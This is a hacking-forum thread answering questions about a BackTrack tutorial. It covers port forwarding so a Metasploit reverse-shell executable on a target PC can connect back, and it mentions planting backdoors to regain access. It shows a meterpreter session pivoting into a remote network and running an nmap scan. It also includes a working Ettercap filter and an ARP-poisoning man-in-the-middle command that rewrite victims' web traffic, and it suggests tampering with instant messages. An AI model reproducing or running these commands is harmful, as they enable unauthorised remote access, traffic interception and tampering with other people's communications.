Glad to be of help
~phoenix910
Marvelous!!!!!! It worked like a dream. Thank you very much. You are a star.Originally Posted by phoenix910
Glad you liked itAll your methodology is correct (just make sure that you run it with administrative permissions in vista to assure that all functions are available). The only thing you'll need to do is set up port forwarding on 82.24.182.140. You will need to go to the router setup page and make sure any external connection attempts to 5555 are sent to the local IP port 5555 of the BT3 box. Then all should connect fine. For specific port forwarding instructions for your router model, visit portforward.com
~phoenix910
Glad to be of help
~phoenix910
thank you very much phoenix910
i have some questions:
i read that i have to put a high port number :i put 5555 and it work perfectly
on my LAN but when i put for example port 80-100-500...
i have no positif response (all the payloads are used for high ports only, for
example if i have a outgoing firewall filter for high port number what should
i do ??)
2)when i connect succesfully to my PC for example for a reason i have a
disconnection between these 2 PC their is any trick to reconnect to it without
the re-opening of the output.exe in the PC ??(without the usage of netcat)
thanks
In theory, and port that isn't being used by either OS should work - however, 80 is often used, as you figured in your example. My advice would be to just modify your firewall's security settings.
And no, unless you've installed a backdoor, there isn't any way to reconnect once you've disconnected - unless the disconnection is between you and a remote shell, and the actual metasploit session stays open; in which case, you can just re-start interaction with that particular session. But if the disconnection happens between server and client, then unless you've installed some form of backdoor (be it user account, remote shell, etc.), you won't be able to get back in without running the executable.
~phoenix910
In my case, 192.168.1.1 is remote router... I did this:
However, 00:22:3F:B5:0Bmeterpreter > route
Network routes
==============
Subnet Netmask Gateway
------ ------- -------
0.0.0.0 0.0.0.0 192.168.1.1
127.0.0.0 255.0.0.0 127.0.0.1
127.0.0.1 255.255.255.255 127.0.0.1
127.255.255.255 255.255.255.255 127.0.0.1
192.168.1.0 255.255.255.0 192.168.1.2
192.168.1.2 255.255.255.255 192.168.1.2
192.168.1.255 255.255.255.255 192.168.1.2
224.0.0.0 240.0.0.0 127.0.0.1
224.0.0.0 240.0.0.0 192.168.1.2
255.255.255.255 255.255.255.255 127.0.0.1
255.255.255.255 255.255.255.255 192.168.1.2
meterpreter >
Background session 2? [y/N]
msf exploit(handler) > route add 192.168.1.0 255.255.255.0 2
msf exploit(handler) > route print
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.1.0 255.255.255.0 Session 2
msf exploit(handler) > nmap -sS -sV -T 5 -P0 -O 192.168.1.1[*] exec: nmap -sS -sV -T 5 -P0 -O 192.168.1.1
Starting Nmap 4.85BETA3 ( http://nmap.org ) at 2009-03-11 23:25 GMT
Interesting ports on 192.168.1.1:
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
23/tcp open telnet?
53/tcp open domain?
80/tcp open http?
5000/tcp open upnp?
MAC Address: 00:22:3F:B5:0B0 (Netgear)
Warning: OSScan results may be unreliable because we could not find at least 1 o pen and 1 closed port
Device type: WAP|switch
Running: Actiontec Linux 2.4.X, HP embedded, Linksys embedded, Netgear embedded
OS details: HP Brocade 4100 switch; or Actiontec MI-424-WR, Linksys WRVS4400N, o r Netgear WNR834B wireless broadband router
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at http: //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds
msf exploit(handler) >
You need it to be on a separate local IP range, as far as I'm aware, otherwise you'll end up scanning yourself.
~phoenix910
Wow great tutorial!! I am interested in the Ettercap portion of the article. Do you have any other guides about filters you have created using ettercap?
I hate Google.
Well, I haven't written any majorly different guides specifically on that, only another similar explanation from a previous tutorial:
But that's from one of my other Ettercap-related articles. If you want more specific stuff, take a look at the structure of that, and the packets you want to manipulate, and write your own, or Google search around a bit for other examplesManipulating the Packets:
The possibilities of packet manipulation are endless, bound only by your creativity,
and the time you are willing to spend exploring the different protocols and how they
work and there relations with inbound traffic and outbound traffic on the network.
Ettercap comes with its own built in filter creator, as well as a few of it's own pre-
made packets. Building your own filter requires a basic knowledge of how
programming languages work, or the ability to analyse and determine how the
Ettercap filters work, which is relatively simple if you are used to analysing
data/packet streams with programs such as Wireshark. Open a new console, and type:
bt ~ # kedit filter.pic
Then copy and paste the following into the window that comes up:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("Modified Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img
src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img
src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
if (ip.proto == UDP && udp.src == 80) {
replace("img src=", "img
src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
replace("IMG SRC=", "img
src=\"http://img405.imageshack.us/img405/328/hacked28hi.png\" ");
msg("Replaced the picture.\n");
}
<-snapshot7.png-> Caption: Image Replacement in Action
Save this, and then close Kedit. In that same console session, run the following
command to turn the code into a filter that is readable by Ettercap:
bt ~ # etterfilter filter.pic -o filter.ef
You will see a few things happen, and then the filter will be created. Basically, the
code is fairly simple. The “if (ip.proto == TCP && tcp.dst/src == 80)” basically tells
Ettercap to only pay attention to the TCP protocol packets on either the destination to
port 80, or the source from port 80 (which is all web related traffic), and then to
follow the instructions that come after that – being to search that packet for a string,
then replace it with what you would like that string to read. You will also notice that
in replacing the strings, we must keep the length of the two strings the same – be
careful to make sure you do this, or it won't work. Now to make this filter run during
your MiTM attack, we must use a slightly altered Ettercap command. The command
to use is (assuming you saved the filter in the /root folder):
bt ~ # sudo ettercap -T -q -F filter.ef -M arp:remote /$IP/ -P autoadd
Now move to another computer, and navigate to a website, and see a lot of pictures
being replaced with the image you specified! This can be quite funny. Alternatively,
you can see the images being replaced by watching the output of your console
session. The filter we created won't work with absolutely every website because of the
many various ways of including images, but it will work with many of them.
Applying this same principal, you can for example figure out the port of a Messenger
program, and modify the outgoing packets to include words of your own – for
example replacing something like “How are you” with something like “I hate you!”
(notice still the same amount of characters – this is essential in general packet
manipulation, however, is not necessary in our image filter, as we are adding to what
is already there [via the use of the slashes], not modifying). Explore, and have fun
with this.
~phoenix910
phoenix910 thanks for the articles you posted,great work!
Interesting, I got the same thing. Just burned the .iso a few days back off the main site. Any ideas on this? Exact same error. Thank you for the great writeup. Already learned a few new things.
Posting Permissions